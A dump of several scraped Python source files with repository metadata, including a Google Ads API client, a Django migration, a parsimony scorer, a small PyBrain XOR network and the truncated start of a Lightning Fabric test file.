67281564909457dc70bb7145aa9e43a1ee83e5a7 | d1bca991935232035b5a373e7b9199a73182fa3f | /0x09-utf8_validation/0-validate_utf8.py | 68d494f4f9fb3e74f157dc50405c7d48f6fa0897 | [] | no_license | felipeserna/holbertonschool-interview | 49ab15a099f5bf29e19d33e4ef738df4fd99d446 | d42763f7a82e551c9effcf2f0e9cf60f959559cd | refs/heads/main | 2023-07-14T08:28:52.457126 | 2021-08-26T16:14:50 | 2021-08-26T16:14:50 | 319,788,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py | #!/usr/bin/python3
"""
Determines if a given data set represents a valid UTF-8 encoding
"""
def validUTF8(data):
"""
Return: True if data is a valid UTF-8 encoding, else return False
"""
try:
bytes(number & 0xFF for number in data).decode()
return True
except UnicodeDecodeError:
return False
| [
"feserna86@gmail.com"
] | feserna86@gmail.com |
a51a1efb119669822af956ee1e58c9ac91795d6f | c16ea32a4cddb6b63ad3bacce3c6db0259d2bacd | /google/ads/googleads/v5/googleads-py/google/ads/googleads/v5/services/services/shopping_performance_view_service/client.py | 4acced62df938f070c61171501f714223c0d70f9 | [
"Apache-2.0"
] | permissive | dizcology/googleapis-gen | 74a72b655fba2565233e5a289cfaea6dc7b91e1a | 478f36572d7bcf1dc66038d0e76b9b3fa2abae63 | refs/heads/master | 2023-06-04T15:51:18.380826 | 2021-06-16T20:42:38 | 2021-06-16T20:42:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,536 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core import client_options as client_options_lib # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport import mtls # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
from google.auth.exceptions import MutualTLSChannelError # type: ignore
from google.oauth2 import service_account # type: ignore
from google.ads.googleads.v5.resources.types import shopping_performance_view
from google.ads.googleads.v5.services.types import shopping_performance_view_service
from .transports.base import ShoppingPerformanceViewServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import ShoppingPerformanceViewServiceGrpcTransport
class ShoppingPerformanceViewServiceClientMeta(type):
    """Metaclass for the ShoppingPerformanceViewService client.

    This provides class-level methods for building and retrieving
    support objects (e.g. transport) without polluting the client instance
    objects.
    """
    # Registry of available transports keyed by label; insertion order
    # matters because the first entry is the default.
    _transport_registry = OrderedDict() # type: Dict[str, Type[ShoppingPerformanceViewServiceTransport]]
    _transport_registry['grpc'] = ShoppingPerformanceViewServiceGrpcTransport

    def get_transport_class(cls,
            label: str = None,
            ) -> Type[ShoppingPerformanceViewServiceTransport]:
        """Return an appropriate transport class.

        Args:
            label: The name of the desired transport. If none is
                provided, then the first transport in the registry is used.

        Returns:
            The transport class to use.
        """
        # If a specific transport is requested, return that one.
        if label:
            return cls._transport_registry[label]

        # No transport is requested; return the default (that is, the first one
        # in the dictionary).
        return next(iter(cls._transport_registry.values()))
class ShoppingPerformanceViewServiceClient(metaclass=ShoppingPerformanceViewServiceClientMeta):
"""Service to fetch Shopping performance views."""
    @staticmethod
    def _get_default_mtls_endpoint(api_endpoint):
        """Convert api endpoint to mTLS endpoint.

        Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
        "*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.

        Args:
            api_endpoint (Optional[str]): the api endpoint to convert.
        Returns:
            str: converted mTLS api endpoint.
        """
        if not api_endpoint:
            return api_endpoint

        # Decompose the host into name / optional ".mtls" / optional
        # ".sandbox" / optional ".googleapis.com" segments.
        mtls_endpoint_re = re.compile(
            r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
        )

        m = mtls_endpoint_re.match(api_endpoint)
        name, mtls, sandbox, googledomain = m.groups()
        # Already an mTLS endpoint, or not a googleapis.com domain:
        # return unchanged.
        if mtls or not googledomain:
            return api_endpoint

        if sandbox:
            return api_endpoint.replace(
                "sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
            )

        return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = 'googleads.googleapis.com'
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ShoppingPerformanceViewServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
ShoppingPerformanceViewServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs['credentials'] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> ShoppingPerformanceViewServiceTransport:
"""Return the transport used by the client instance.
Returns:
ShoppingPerformanceViewServiceTransport: The transport used by the client instance.
"""
return self._transport
@staticmethod
def shopping_performance_view_path(customer: str,) -> str:
"""Return a fully-qualified shopping_performance_view string."""
return "customers/{customer}/shoppingPerformanceView".format(customer=customer, )
@staticmethod
def parse_shopping_performance_view_path(path: str) -> Dict[str,str]:
"""Parse a shopping_performance_view path into its component segments."""
m = re.match(r"^customers/(?P<customer>.+?)/shoppingPerformanceView$", path)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(billing_account: str, ) -> str:
"""Return a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(billing_account=billing_account, )
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str,str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(folder: str, ) -> str:
"""Return a fully-qualified folder string."""
return "folders/{folder}".format(folder=folder, )
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str,str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(organization: str, ) -> str:
"""Return a fully-qualified organization string."""
return "organizations/{organization}".format(organization=organization, )
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str,str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(project: str, ) -> str:
"""Return a fully-qualified project string."""
return "projects/{project}".format(project=project, )
@staticmethod
def parse_common_project_path(path: str) -> Dict[str,str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(project: str, location: str, ) -> str:
"""Return a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(project=project, location=location, )
@staticmethod
def parse_common_location_path(path: str) -> Dict[str,str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
    def __init__(self, *,
            credentials: Optional[ga_credentials.Credentials] = None,
            transport: Union[str, ShoppingPerformanceViewServiceTransport, None] = None,
            client_options: Optional[client_options_lib.ClientOptions] = None,
            client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
            ) -> None:
        """Instantiate the shopping performance view service client.
        Args:
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
            transport (Union[str, ~.ShoppingPerformanceViewServiceTransport]): The
                transport to use. If set to None, a transport is chosen
                automatically.
            client_options (google.api_core.client_options.ClientOptions): Custom options for the
                client. It won't take effect if a ``transport`` instance is provided.
                (1) The ``api_endpoint`` property can be used to override the
                default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
                environment variable can also be used to override the endpoint:
                "always" (always use the default mTLS endpoint), "never" (always
                use the default regular endpoint) and "auto" (auto switch to the
                default mTLS endpoint if client certificate is present, this is
                the default value). However, the ``api_endpoint`` property takes
                precedence if provided.
                (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
                is "true", then the ``client_cert_source`` property can be used
                to provide client certificate for mutual TLS transport. If
                not provided, the default SSL client certificate will be used if
                present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
                set, no client certificate will be used.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
        Raises:
            google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
                creation failed for any reason.
        """
        # Normalize: a plain dict is accepted in place of a ClientOptions object.
        if isinstance(client_options, dict):
            client_options = client_options_lib.from_dict(client_options)
        if client_options is None:
            client_options = client_options_lib.ClientOptions()
        # Create SSL credentials for mutual TLS if needed.
        # Opt-in is controlled by the GOOGLE_API_USE_CLIENT_CERTIFICATE env var.
        use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")))
        ssl_credentials = None
        is_mtls = False
        if use_client_cert:
            if client_options.client_cert_source:
                # A caller-supplied cert source takes precedence over the
                # machine's default SSL credentials.
                import grpc  # type: ignore
                cert, key = client_options.client_cert_source()
                ssl_credentials = grpc.ssl_channel_credentials(
                    certificate_chain=cert, private_key=key
                )
                is_mtls = True
            else:
                creds = SslCredentials()
                is_mtls = creds.is_mtls
                ssl_credentials = creds.ssl_credentials if is_mtls else None
        # Figure out which api endpoint to use.
        # An explicit client_options.api_endpoint always wins; otherwise the
        # GOOGLE_API_USE_MTLS_ENDPOINT env var ("never"/"always"/"auto") decides.
        if client_options.api_endpoint is not None:
            api_endpoint = client_options.api_endpoint
        else:
            use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
            if use_mtls_env == "never":
                api_endpoint = self.DEFAULT_ENDPOINT
            elif use_mtls_env == "always":
                api_endpoint = self.DEFAULT_MTLS_ENDPOINT
            elif use_mtls_env == "auto":
                api_endpoint = self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT
            else:
                raise MutualTLSChannelError(
                    "Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always"
                )
        # Save or instantiate the transport.
        # Ordinarily, we provide the transport, but allowing a custom transport
        # instance provides an extensibility point for unusual situations.
        if isinstance(transport, ShoppingPerformanceViewServiceTransport):
            # transport is a ShoppingPerformanceViewServiceTransport instance.
            if credentials:
                raise ValueError('When providing a transport instance, '
                                 'provide its credentials directly.')
            self._transport = transport
        elif isinstance(transport, str):
            # NOTE(review): this branch uses DEFAULT_ENDPOINT and does not
            # forward the api_endpoint/ssl_credentials computed above.
            Transport = type(self).get_transport_class(transport)
            self._transport = Transport(
                credentials=credentials, host=self.DEFAULT_ENDPOINT
            )
        else:
            self._transport = ShoppingPerformanceViewServiceGrpcTransport(
                credentials=credentials,
                host=api_endpoint,
                ssl_channel_credentials=ssl_credentials,
                client_info=client_info,
            )
    def get_shopping_performance_view(self,
            request: shopping_performance_view_service.GetShoppingPerformanceViewRequest = None,
            *,
            resource_name: str = None,
            retry: retries.Retry = gapic_v1.method.DEFAULT,
            timeout: float = None,
            metadata: Sequence[Tuple[str, str]] = (),
            ) -> shopping_performance_view.ShoppingPerformanceView:
        r"""Returns the requested Shopping performance view in
        full detail.
        Args:
            request (:class:`google.ads.googleads.v5.services.types.GetShoppingPerformanceViewRequest`):
                The request object. Request message for
                [ShoppingPerformanceViewService.GetShoppingPerformanceView][google.ads.googleads.v5.services.ShoppingPerformanceViewService.GetShoppingPerformanceView].
            resource_name (:class:`str`):
                Required. The resource name of the
                Shopping performance view to fetch.
                This corresponds to the ``resource_name`` field
                on the ``request`` instance; if ``request`` is provided, this
                should not be set.
            retry (google.api_core.retry.Retry): Designation of what errors, if any,
                should be retried.
            timeout (float): The timeout for this request.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.
        Returns:
            google.ads.googleads.v5.resources.types.ShoppingPerformanceView:
                Shopping performance view.
                Provides Shopping campaign statistics
                aggregated at several product dimension
                levels. Product dimension values from
                Merchant Center such as brand, category,
                custom attributes, product condition and
                product type will reflect the state of
                each dimension as of the date and time
                when the corresponding event was
                recorded.
        """
        # Create or coerce a protobuf request object.
        # Sanity check: If we got a request object, we should *not* have
        # gotten any keyword arguments that map to the request.
        if request is not None and any([resource_name]):
            raise ValueError('If the `request` argument is set, then none of '
                             'the individual field arguments should be set.')
        # Minor optimization to avoid making a copy if the user passes
        # in a shopping_performance_view_service.GetShoppingPerformanceViewRequest.
        # There's no risk of modifying the input as we've already verified
        # there are no flattened fields.
        if not isinstance(request, shopping_performance_view_service.GetShoppingPerformanceViewRequest):
            request = shopping_performance_view_service.GetShoppingPerformanceViewRequest(request)
        # If we have keyword arguments corresponding to fields on the
        # request, apply these.
        if resource_name is not None:
            request.resource_name = resource_name
        # Wrap the RPC method; this adds retry and timeout information,
        # and friendly error handling.
        rpc = self._transport._wrapped_methods[self._transport.get_shopping_performance_view]
        # Certain fields should be provided within the metadata header;
        # add these here.
        # The resource_name is sent as a gRPC routing header.
        metadata = tuple(metadata) + (
            gapic_v1.routing_header.to_grpc_metadata((
                ('resource_name', request.resource_name),
            )),
        )
        # Send the request.
        response = rpc(
            request,
            retry=retry,
            timeout=timeout,
            metadata=metadata,
        )
        # Done; return the response.
        return response
# Public names exported by this module.
__all__ = (
    'ShoppingPerformanceViewServiceClient',
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
55c9cd30b623e0a078ad1d54a62099bb5c2984c0 | 80edae503da03b3350fe458553860ea44a1a74dd | /backend/tasker_business/migrations/0001_initial.py | 1becb346c243dade1b06e637926556b3c9397ec7 | [] | no_license | crowdbotics-apps/our-protection-26031 | e4059bd616eff63f0d67ec869b49b9f6530fd2e6 | 7dbeef820b127efdf5c2a87d47a934b06c0ba87e | refs/heads/master | 2023-04-15T14:38:17.312365 | 2021-04-29T22:45:17 | 2021-04-29T22:45:17 | 362,954,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,277 | py | # Generated by Django 2.2.19 on 2021-04-29 22:42
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the tasker_business app (auto-generated by Django).

    Creates the ``Timeslot``, ``TaskerSkill``, ``TaskerAvailability`` and
    ``BusinessPhoto`` models.  Do not hand-edit the operations: migration
    state must match what ``makemigrations`` generated.
    """

    initial = True

    # Apps whose initial migrations must run first (FK/M2M targets below).
    dependencies = [
        ("task_category", "0001_initial"),
        ("task_profile", "0001_initial"),
    ]

    operations = [
        # A single bookable time window on a given date.
        migrations.CreateModel(
            name="Timeslot",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("date", models.DateField()),
                ("start_time", models.TimeField()),
                ("end_time", models.TimeField()),
            ],
        ),
        # A skill a tasker offers, with an hourly rate and category links.
        migrations.CreateModel(
            name="TaskerSkill",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("name", models.CharField(max_length=255)),
                ("rate", models.FloatField()),
                ("description", models.TextField()),
                (
                    "category",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="taskerskill_category",
                        to="task_category.Category",
                    ),
                ),
                (
                    # Optional: a skill may have no subcategory.
                    "subcategory",
                    models.ForeignKey(
                        blank=True,
                        null=True,
                        on_delete=django.db.models.deletion.SET_NULL,
                        related_name="taskerskill_subcategory",
                        to="task_category.Subcategory",
                    ),
                ),
                (
                    "tasker",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="taskerskill_tasker",
                        to="task_profile.TaskerProfile",
                    ),
                ),
            ],
        ),
        # One-to-one availability record linking a tasker to their timeslots.
        migrations.CreateModel(
            name="TaskerAvailability",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                (
                    "tasker",
                    models.OneToOneField(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="taskeravailability_tasker",
                        to="task_profile.TaskerProfile",
                    ),
                ),
                (
                    "timeslots",
                    models.ManyToManyField(
                        related_name="taskeravailability_timeslots",
                        to="tasker_business.Timeslot",
                    ),
                ),
            ],
        ),
        # A photo (stored as a URL) showcasing a tasker's business.
        migrations.CreateModel(
            name="BusinessPhoto",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("photo", models.URLField()),
                ("description", models.TextField()),
                (
                    "tasker",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="businessphoto_tasker",
                        to="task_profile.TaskerProfile",
                    ),
                ),
            ],
        ),
    ]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
4a97cb424cf33bfbbc4a39b5a6c9b7b242fab2db | 272032c7604e0e9627f4cf42967aa3230a8facbc | /lect7dendropy/pars.py | c5af0dc1b8f6ece33455f2e44c9d8135f55c2585 | [] | no_license | mtholder/eebprogramming | 78ebaf5ca2163cc7da977b411087bf164fce6059 | b7478643b4cb3ce91c299753eb346626640c3378 | refs/heads/master | 2021-01-01T18:34:27.502098 | 2010-05-06T16:26:50 | 2010-05-06T16:26:50 | 493,047 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 4,577 | py | #!/usr/bin/env python
import sys, logging
from dendropy.utility.messaging import get_logger
_LOG = get_logger('sankoff')
from dendropy import DataSet
_DEBUGGING = True  # when True, unexpected exceptions in __main__ re-raise with a traceback
verbose = False  # NOTE(review): appears unused; the -v flag sets options.verbose instead — confirm before removing
def get_min_edge_costs(cost_row, costs_for_one_child):
    """Return the minimum over child states of (transition cost + child subtree cost).

    `cost_row` holds the step costs from one ancestral state into each child
    state; `costs_for_one_child` holds the child's subtree cost per state.
    Both sequences must have the same length (one entry per state).
    """
    # Bug fix: the original used `xrange`, which does not exist under the
    # python3 shebang this script declares; `min`+`zip` replaces the loop.
    return min(step + subtree for step, subtree in zip(cost_row, costs_for_one_child))
def get_min_cost(step_mat_row, child_costs):
    """Sum, over all children, the cheapest (step + subtree) cost when the
    ancestor's row of step costs is `step_mat_row`."""
    return sum(get_min_edge_costs(step_mat_row, e) for e in child_costs)
def sankoff(postorder_node_list, taxa_to_state_set_map, step_matrix):
    """Compute a tree's parsimony score with Sankoff's dynamic programming.

    `postorder_node_list` must list the tree's nodes in postorder (children
    before parents).  `taxa_to_state_set_map` maps each leaf's taxon to a
    list (one entry per character pattern) of sets of observed states.
    `step_matrix` is a square matrix of transition costs between states.

    Each node gets a `char_costs` attribute (per-pattern list of per-state
    costs); the function returns the total minimum cost over all patterns.
    """
    # Find the largest single-step cost; anything above it marks a leaf
    # state as "not observed" without risking ties with real costs.
    max_cost = 0
    num_states = len(step_matrix)
    for row in step_matrix:
        for cell in row:
            if cell > max_cost:
                max_cost = cell
    impossible_cost = 1 + max_cost
    impossible_cost_row = [impossible_cost] * num_states
    score = 0
    for nd in postorder_node_list:
        if nd.is_leaf():
            # Leaves: cost 0 for each observed state, "impossible" otherwise.
            char_costs = []
            for char_ss in taxa_to_state_set_map[nd.taxon]:
                el = list(impossible_cost_row)
                for observed_state in char_ss:
                    el[observed_state] = 0
                char_costs.append(el)
            nd.char_costs = char_costs
            _LOG.debug('%s -> %s', nd.taxon.label, nd.char_costs)
        else:
            # Internal nodes: for every pattern and every candidate ancestral
            # state, take the cheapest assignment over the children.
            child_list = nd.child_nodes()
            char_costs = []
            num_patterns = len(child_list[0].char_costs)
            # Bug fix: `xrange` (Python 2 only) replaced with `range`.
            for pattern_index in range(num_patterns):
                child_costs = [c.char_costs[pattern_index] for c in child_list]
                el = []
                for anc_state in range(num_states):
                    el.append(get_min_cost(step_matrix[anc_state], child_costs))
                char_costs.append(el)
            nd.char_costs = char_costs
            _LOG.debug('Internal node -> %s', nd.char_costs)
            if not nd.parent_node:
                # Root: accumulate the cheapest root-state cost per pattern.
                for pattern_index in range(num_patterns):
                    score += min(nd.char_costs[pattern_index])
    return score
def pars_score_tree(tree, taxa_to_states, step_matrix=None):
    """Return the Sankoff parsimony score of `tree`.

    `taxa_to_states` maps each taxon to its per-pattern observed state sets.
    When `step_matrix` is None, a 4-state unit-cost (Fitch-style) matrix is
    used.
    """
    if step_matrix is None:
        # Default: any change between the 4 states costs 1.
        step_matrix = [[0, 1, 1, 1],
                       [1, 0, 1, 1],
                       [1, 1, 0, 1],
                       [1, 1, 1, 0]]
    node_list = list(tree.postorder_node_iter())
    return sankoff(node_list, taxa_to_states, step_matrix)
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser()
parser.add_option('-v', '--verbose',
dest='verbose',
action="store_true",
default=False,
help="Verbose execution mode")
(options, args) = parser.parse_args()
if len(args) == 0:
sys.exit("Expecting a filename as an argument")
if options.verbose:
_LOG.setLevel(logging.DEBUG)
tree_index = 0
try:
for f in args:
fo = open(f, "rU")
dataset = DataSet()
dataset.read(stream=fo, schema="NEXUS")
if len(dataset.taxon_sets) != 1:
raise ValueError("Expecting one set of taxa in %s" % f)
taxon_set = dataset.taxon_sets[0]
if len(dataset.tree_lists) != 1:
raise ValueError("Expecting one tree block in %s" % f)
tree_list = dataset.tree_lists[0]
if len(dataset.char_matrices) != 1:
raise ValueError("Expecting one character matrix in %s" % f)
char_mat = dataset.char_matrices[0]
num_char = len(char_mat[0])
taxon_to_state_set = char_mat.create_taxon_to_state_set_map()
for taxon, chars in taxon_to_state_set.iteritems():
_LOG.debug(taxon.label + ' ' + str(chars))
for tree in tree_list:
_LOG.debug(str(tree))
print pars_score_tree(tree, taxon_to_state_set, [ [0, 5, 1, 5],
[5, 0, 5, 1],
[1, 5, 0, 5],
[5, 1, 5, 0],
])
except Exception as x:
if _DEBUGGING:
raise
sys.exit(str(x))
| [
"mtholder@gmail.com"
] | mtholder@gmail.com |
541d1592cf2ae6cebfff7a7b20f3462f581214cc | 30fb85c14e18956fe5690f4224e55d3fa34651ce | /ml_neural_networks_pybrain_hidden_layers.py | 74540ed511b295a20436d4a35911af2b1d035e41 | [] | no_license | TiagoArrazi/Semantix-Internship | 1d39cc310b75be3b395d3a7df1dde7543fa4db84 | 87f93db82e9594ce0911b4e6264a4981e4f0ac14 | refs/heads/master | 2020-04-02T22:53:25.937133 | 2020-01-17T12:58:40 | 2020-01-17T12:58:40 | 154,848,050 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | py | #! /usr/bin/env python3
# Classification with PyBrain - 3D XOR
from pybrain.datasets import SupervisedDataSet
from pybrain.tools.shortcuts import buildNetwork
from pybrain.supervised import BackpropTrainer
dataset = SupervisedDataSet(3, 1)
dataset.addSample([0, 0, 0], [0])
dataset.addSample([0, 0, 1], [1])
dataset.addSample([0, 1, 0], [1])
dataset.addSample([0, 1, 1], [0])
dataset.addSample([1, 0, 0], [1])
dataset.addSample([1, 0, 1], [0])
dataset.addSample([1, 1, 0], [0])
ataset.addSample([1, 1, 1], [1])
network = buildNetwork(dataset.indim, 6, 6, dataset.outdim, bias=True)
trainer = BackpropTrainer(network, dataset, learningrate=0.01, momentum=0.9)
trainer.trainEpochs(10000)
test = SupervisedDataSet(3, 1)
test.addSample([0, 0, 0], [0])
test.addSample([0, 0, 1], [1])
test.addSample([0, 1, 0], [1])
test.addSample([0, 1, 1], [0])
test.addSample([1, 0, 0], [1])
test.addSample([1, 0, 1], [0])
test.addSample([1, 1, 0], [0])
test.addSample([1, 1, 1], [1])
trainer.testOnData(test, verbose=True)
| [
"tiago_arrazi98@outlook.com"
] | tiago_arrazi98@outlook.com |
0cf22fe3aa57e99a7fbc6dc4b130ea7deb1c47ac | 23e844d75a0214ed5ad48885d008e23516383610 | /toughio/_utils/relative_permeability/_fatt_klikoff.py | 4ce84e87d5101ff08fb032c15715b9972bbe9848 | [
"MIT"
] | permissive | codacy-badger/toughio | dc1b138a5defa7b00b0833526d67c372d9b6d1f5 | 8d4f3d8408d5507a83f65e7f393b13be08d42aca | refs/heads/master | 2021-02-04T21:32:49.721095 | 2020-02-28T07:49:33 | 2020-02-28T07:49:33 | 243,711,552 | 0 | 0 | MIT | 2020-02-28T08:15:36 | 2020-02-28T08:15:36 | null | UTF-8 | Python | false | false | 920 | py | from ._base import BaseRelativePermeability
# Public API of this module.
__all__ = [
    "FattKlikoff",
]
class FattKlikoff(BaseRelativePermeability):
    """Fatt and Klikoff's relative permeability function.

    After Fatt and Klikoff (1959).

    Parameters
    ----------
    slr : scalar
        Irreducible liquid saturation (RP(1)). Must be strictly less than 1.

    """

    _id = 7
    _name = "Fatt-Klikoff"

    def __init__(self, slr):
        """Initialize the model after validating the irreducible saturation."""
        if slr >= 1.0:
            # Improvement: the original raised a bare ValueError with no message.
            raise ValueError("slr must be lower than 1.0")
        self.parameters = [slr]

    def _eval(self, sl, slr):
        """Return (kl, kg) relative permeabilities at liquid saturation `sl`.

        The effective saturation is 0 below `slr`, then scaled linearly;
        both permeabilities are its cube (resp. the cube of its complement).
        """
        Seff = (sl - slr) / (1.0 - slr) if sl > slr else 0.0
        kl = Seff ** 3
        kg = (1.0 - Seff) ** 3
        return kl, kg

    @property
    def parameters(self):
        """Return model parameters as the list [slr]."""
        return [self._slr]

    @parameters.setter
    def parameters(self, value):
        if len(value) != 1:
            # Improvement: explicit message instead of a bare ValueError.
            raise ValueError("expected exactly one parameter (slr)")
        self._slr = value[0]
| [
"keurfonluu@outlook.com"
] | keurfonluu@outlook.com |
318d451e5e9baa4b1d4cc02121cf2c36efd4eab3 | 959a7b17884aa9af1d38d9c6b0afe2045a9be5d2 | /Online Stock Span.py | 47a2706584a1006572a38de6b4dcb896fef431dd | [] | no_license | dumavit/leetcode | a1c998f4c56411b061995d939093b03f7aae366b | 866689f564125ca4152dc1b6b3d268991d7ec89a | refs/heads/master | 2022-02-07T20:44:17.388121 | 2022-01-31T21:02:28 | 2022-01-31T21:02:28 | 252,981,197 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | class StockSpanner:
def __init__(self):
self.stack = []
def next(self, price):
res = 1
while self.stack and self.stack[-1][0] <= price:
res += self.stack.pop()[1]
self.stack.append([price, res])
return res
# Your StockSpanner object will be instantiated and called as such:
# obj = StockSpanner()
# param_1 = obj.next(price)
| [
"vitalii.duma@corva.ai"
] | vitalii.duma@corva.ai |
631803569c7f82f06c6e7ae6b7b80050c78627b2 | 3b4f985759e44dc169134ae7dcee8e92747c4b01 | /tests/tests_fabric/test_fabric.py | 076f6515acf2bd3aecd6863fe1b3dab512ebab32 | [
"Apache-2.0"
] | permissive | SkafteNicki/pytorch-lightning | 4b09863bf222241ca7128d13df94ff60b71e50aa | 7df627b43746a85aa87671bec3e6dada0d98b556 | refs/heads/master | 2023-07-15T21:20:02.468216 | 2023-05-04T08:12:33 | 2023-05-04T08:12:33 | 248,216,299 | 3 | 1 | Apache-2.0 | 2023-07-10T02:40:24 | 2020-03-18T11:44:20 | Python | UTF-8 | Python | false | false | 39,347 | py | # Copyright The Lightning AI team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from re import escape
from unittest import mock
from unittest.mock import ANY, call, MagicMock, Mock, PropertyMock
import pytest
import torch
import torch.distributed
import torch.nn.functional
from lightning_utilities.test.warning import no_warning_call
from torch import nn
from torch.utils.data import DataLoader, DistributedSampler, RandomSampler, Sampler, SequentialSampler, TensorDataset
from lightning.fabric.fabric import Fabric
from lightning.fabric.plugins import Precision
from lightning.fabric.strategies import (
DDPStrategy,
DeepSpeedStrategy,
ParallelStrategy,
SingleDeviceStrategy,
Strategy,
XLAStrategy,
)
from lightning.fabric.strategies.strategy import _Sharded
from lightning.fabric.utilities.exceptions import MisconfigurationException
from lightning.fabric.utilities.seed import pl_worker_init_function, seed_everything
from lightning.fabric.utilities.warnings import PossibleUserWarning
from lightning.fabric.wrappers import _FabricDataLoader, _FabricModule, _FabricOptimizer
from tests_fabric.helpers.runif import RunIf
class BoringModel(nn.Module):
    """Minimal linear model used as a stand-in module in the tests below."""

